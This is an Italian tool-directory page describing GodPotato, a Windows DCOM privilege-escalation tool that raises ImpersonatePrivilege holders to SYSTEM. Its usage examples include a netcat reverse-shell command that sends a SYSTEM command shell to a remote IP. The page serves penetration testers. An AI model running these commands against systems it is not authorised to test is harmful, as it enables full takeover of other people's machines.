Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
GodPotato — Strumento di escalation dei privilegi basato su DCOM per Windows Server 2012-2022 e Windows 8-11, che eleva gli utenti con ImpersonatePrivilege a NT AUTHORITY\SYSTEM tramite la vulnerabilità rpcss oxid. | Kitploit
Strumenti/GitHubGitHub/beichendream/godpotato
Escalation di PrivilegiExploitPost-ExploitPenetration Testing
GitHubbeichendream/godpotato

GodPotato

Strumento di escalation dei privilegi basato su DCOM per Windows Server 2012-2022 e Windows 8-11, che eleva gli utenti con ImpersonatePrivilege a NT AUTHORITY\SYSTEM tramite la vulnerabilità rpcss oxid.

Vedi Repository
2.3k273292 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

GodPotato

Basandomi sulla storia dell'escalation dei privilegi Potato negli ultimi 6 anni, dall'inizio di RottenPotato fino alla fine di JuicyPotatoNG, ho scoperto una nuova tecnologia studiando DCOM, che consente l'escalation dei privilegi in Windows 2012 - Windows 2022, ora basta avere il permesso "ImpersonatePrivilege". Allora sei "NT AUTHORITY\SYSTEM", di solito i servizi WEB e i servizi di database hanno i permessi "ImpersonatePrivilege".

L'escalation dei privilegi Potato viene solitamente utilizzata quando otteniamo privilegi WEB/database. Possiamo elevare un utente di servizio con privilegi bassi a privilegi "NT AUTHORITY\SYSTEM". Tuttavia, lo storico Potato non ha modo di funzionare sugli ultimi sistemi Windows. Mentre studiavo DCOM, ho trovato un nuovo metodo che può eseguire l'escalation dei privilegi. Ci sono alcuni difetti in rpcss quando gestisce oxid, e rpcss è un servizio che deve essere aperto dal sistema, quindi può funzionare su quasi qualsiasi sistema operativo Windows, l'ho chiamato GodPotato.

Versione interessata

Windows Server 2012 - Windows Server 2022 Windows8 - Windows 11

Esempio

root@kitploit:~

    FFFFF                   FFF  FFFFFFF
   FFFFFFF                  FFF  FFFFFFFF
  FFF  FFFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
 FFFF        FFFFFFF   FFFFFFFF  FFF   FFF  FFFFFFF  FFFFFFFFF   FFFFFF  FFFFFFFFF    FFFFFF
 FFFF       FFFF FFFF  FFF FFFF  FFF  FFFF FFFF FFFF   FFF      FFF  FFF    FFF      FFF FFFF
 FFFF FFFFF FFF   FFF FFF   FFF  FFFFFFFF  FFF   FFF   FFF      F    FFF    FFF     FFF   FFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF         FFFFF    FFF     FFF   FFFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF      FFFFFFFF    FFF     FFF   FFFF
  FFF   FFF FFF   FFF FFF   FFF  FFF       FFF   FFF   FFF     FFFF  FFF    FFF     FFF   FFFF
  FFFF FFFF FFFF  FFF FFFF  FFF  FFF       FFF  FFFF   FFF     FFFF  FFF    FFF     FFFF  FFF
   FFFFFFFF  FFFFFFF   FFFFFFFF  FFF        FFFFFFF     FFFFFF  FFFFFFFF    FFFFFFF  FFFFFFF
    FFFFFFF   FFFFF     FFFFFFF  FFF         FFFFF       FFFFF   FFFFFFFF     FFFF     FFFF


Argomenti:

        -cmd Richiesto:True Riga di comando (default cmd /c whoami)

Esempio:

GodPotato -cmd "cmd /c whoami"


Usa il Clsid integrato del programma per l'escalation dei privilegi ed esegui un semplice comando

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

Personalizza Clsid ed esegui comandi

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

Esegui comandi di reverse shell

root@kitploit:~
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

Ringraziamenti

zcgonvh

skay

Licenza

Apache License 2.0

Scarica lo strumento